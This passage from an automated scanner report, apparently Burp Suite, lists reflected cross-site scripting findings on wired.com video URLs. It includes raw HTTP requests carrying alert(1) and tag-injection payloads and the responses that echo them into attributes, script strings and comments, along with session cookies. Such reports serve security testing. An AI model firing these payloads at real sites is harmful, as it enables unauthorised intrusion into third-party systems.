Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29422
Vary: Accept-Encoding
Cache-Control: max-age=290
Expires: Mon, 22 Nov 2010 00:58:55 GMT
Date: Mon, 22 Nov 2010 00:54:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video40544"><a>75e6bfb0ef ss_avatar-extended-collectors-edition c_628119810001">
...[SNIP]...

1.849. http://www.wired.com/video/avatar-extended-collectors-edition/628119810001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/avatar-extended-collectors-edition/628119810001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d30cf"><a>691b350cceb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/avatar-extended-collectors-editiond30cf"><a>691b350cceb/628119810001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:59:59 GMT
Date: Mon, 22 Nov 2010 00:54:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106693


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_avatar-extended-collectors-editiond30cf"><a>691b350cceb c_628119810001">
...[SNIP]...

1.850. http://www.wired.com/video/avatar-extended-collectors-edition/628119810001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/avatar-extended-collectors-edition/628119810001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 305ca"-alert(1)-"f052dbfe7ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/avatar-extended-collectors-edition305ca"-alert(1)-"f052dbfe7ac/628119810001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=292
Expires: Mon, 22 Nov 2010 01:00:43 GMT
Date: Mon, 22 Nov 2010 00:55:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106778


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "avatar-extended-collectors-edition305ca"-alert(1)-"f052dbfe7ac","628119810001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.851. http://www.wired.com/video/avatar-extended-collectors-edition/628119810001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/avatar-extended-collectors-edition/628119810001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb6b6"-alert(1)-"4e116abbec8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/avatar-extended-collectors-edition/628119810001fb6b6"-alert(1)-"4e116abbec8 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 01:01:50 GMT
Date: Mon, 22 Nov 2010 00:56:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106707


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "628119810001fb6b6"-alert(1)-"4e116abbec8","avatar-extended-collectors-edition","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.852. http://www.wired.com/video/avatar-extended-collectors-edition/628119810001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/avatar-extended-collectors-edition/628119810001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4644"><a>05c932d0f68 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/avatar-extended-collectors-edition/628119810001d4644"><a>05c932d0f68 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=283
Expires: Mon, 22 Nov 2010 01:00:38 GMT
Date: Mon, 22 Nov 2010 00:55:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106754


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_avatar-extended-collectors-edition c_628119810001d4644"><a>05c932d0f68">
...[SNIP]...

1.853. http://www.wired.com/video/behind-the-scenes-2012/69568495001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-2012/69568495001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64d32"><a>32ba8c93064 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video64d32"><a>32ba8c93064/behind-the-scenes-2012/69568495001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29398
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:55:27 GMT
Date: Mon, 22 Nov 2010 00:50:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video64d32"><a>32ba8c93064 ss_behind-the-scenes-2012 c_69568495001">
...[SNIP]...

1.854. http://www.wired.com/video/behind-the-scenes-2012/69568495001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-2012/69568495001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 33770--><script>alert(1)</script>9aa5c2d1631 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video33770--><script>alert(1)</script>9aa5c2d1631/behind-the-scenes-2012/69568495001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29432
Vary: Accept-Encoding
Cache-Control: max-age=272
Expires: Mon, 22 Nov 2010 00:55:38 GMT
Date: Mon, 22 Nov 2010 00:51:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video33770--><script>alert(1)</script>9aa5c2d1631/behind-the-scenes-2012/69568495001
-->
...[SNIP]...

1.855. http://www.wired.com/video/behind-the-scenes-2012/69568495001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-2012/69568495001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d6dd"><a>fd0757c5f70 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/behind-the-scenes-20124d6dd"><a>fd0757c5f70/69568495001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=295
Expires: Mon, 22 Nov 2010 00:56:10 GMT
Date: Mon, 22 Nov 2010 00:51:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106758


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_behind-the-scenes-20124d6dd"><a>fd0757c5f70 c_69568495001">
...[SNIP]...

1.856. http://www.wired.com/video/behind-the-scenes-2012/69568495001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-2012/69568495001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50784"-alert(1)-"fe00a872adb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/behind-the-scenes-201250784"-alert(1)-"fe00a872adb/69568495001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=270
Expires: Mon, 22 Nov 2010 00:56:42 GMT
Date: Mon, 22 Nov 2010 00:52:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106742


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "69568495001","behind-the-scenes-201250784"-alert(1)-"fe00a872adb","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.857. http://www.wired.com/video/behind-the-scenes-2012/69568495001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-2012/69568495001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be55a"-alert(1)-"9e0b3694c11 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/behind-the-scenes-2012/69568495001be55a"-alert(1)-"9e0b3694c11 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:58:44 GMT
Date: Mon, 22 Nov 2010 00:53:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106727


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "69568495001be55a"-alert(1)-"9e0b3694c11","behind-the-scenes-2012","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.858. http://www.wired.com/video/behind-the-scenes-2012/69568495001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-2012/69568495001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce64a"><a>8daa3aab393 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/behind-the-scenes-2012/69568495001ce64a"><a>8daa3aab393 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=294
Expires: Mon, 22 Nov 2010 00:57:24 GMT
Date: Mon, 22 Nov 2010 00:52:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106758


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_behind-the-scenes-2012 c_69568495001ce64a"><a>8daa3aab393">
...[SNIP]...

1.859. http://www.wired.com/video/behind-the-scenes-disney-epic-mickey-video-game/625093660001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-disney-epic-mickey-video-game/625093660001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3887d"><a>2f22d43b5dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video3887d"><a>2f22d43b5dd/behind-the-scenes-disney-epic-mickey-video-game/625093660001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29450
Vary: Accept-Encoding
Cache-Control: max-age=289
Expires: Mon, 22 Nov 2010 00:56:25 GMT
Date: Mon, 22 Nov 2010 00:51:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_video3887d"><a>2f22d43b5dd ss_behind-the-scenes-disney-epic-mickey-video-game c_625093660001">
...[SNIP]...

1.860. http://www.wired.com/video/behind-the-scenes-disney-epic-mickey-video-game/625093660001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-disney-epic-mickey-video-game/625093660001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload eef9d--><script>alert(1)</script>94cd6923bf8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /videoeef9d--><script>alert(1)</script>94cd6923bf8/behind-the-scenes-disney-epic-mickey-video-game/625093660001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29483
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:57:32 GMT
Date: Mon, 22 Nov 2010 00:52:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /videoeef9d--><script>alert(1)</script>94cd6923bf8/behind-the-scenes-disney-epic-mickey-video-game/625093660001
-->
...[SNIP]...

1.861. http://www.wired.com/video/behind-the-scenes-disney-epic-mickey-video-game/625093660001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-disney-epic-mickey-video-game/625093660001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b028"-alert(1)-"fe00e1d27f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/behind-the-scenes-disney-epic-mickey-video-game9b028"-alert(1)-"fe00e1d27f6/625093660001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=288
Expires: Mon, 22 Nov 2010 00:58:35 GMT
Date: Mon, 22 Nov 2010 00:53:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106794


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "behind-the-scenes-disney-epic-mickey-video-game9b028"-alert(1)-"fe00e1d27f6","625093660001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.862. http://www.wired.com/video/behind-the-scenes-disney-epic-mickey-video-game/625093660001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/behind-the-scenes-disney-epic-mickey-video-game/625093660001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab0ae"><a>c48df1a3910 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/behind-the-scenes-disney-epic-mickey-video-gameab0ae"><a>c48df1a3910/625093660001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=299
Expires: Mon, 22 Nov 2010 00:57:33 GMT
Date: Mon, 22 Nov 2010 00:52:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106810


